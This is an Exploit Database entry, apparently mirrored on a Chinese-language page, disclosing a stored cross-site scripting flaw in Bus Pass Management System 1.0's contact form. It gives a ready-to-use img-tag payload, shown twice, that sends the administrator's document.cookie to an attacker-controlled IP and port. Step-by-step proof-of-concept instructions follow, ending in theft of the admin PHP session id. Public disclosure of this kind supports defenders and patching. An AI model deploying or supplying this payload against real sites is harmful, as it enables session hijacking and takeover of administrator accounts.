Bus Pass Management System 1.0 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： Matteo Conti
  日期： 2023-04-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51242/

• # Exploit Title: Bus Pass Management System 1.0- Stored Cross-Site Scripting (XSS)
  # Date: 2021-09-17
  # Exploit Author: Matteo Conti - https://deltaspike.io
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
  # Version: 1.0
  # Tested on: Ubuntu 18.04 - LAMP
  
  # Description
  The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
  maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.
  
  
  # Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)
  
  # Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
  
  # Prof of concept:
  
  - From /contact.php, send a message containing the following payload in "title" or "message" fields:
  
  <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
  (the first url have to be an existing image)
  
  - Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php
  
  - Your listener will receive the PHP session id.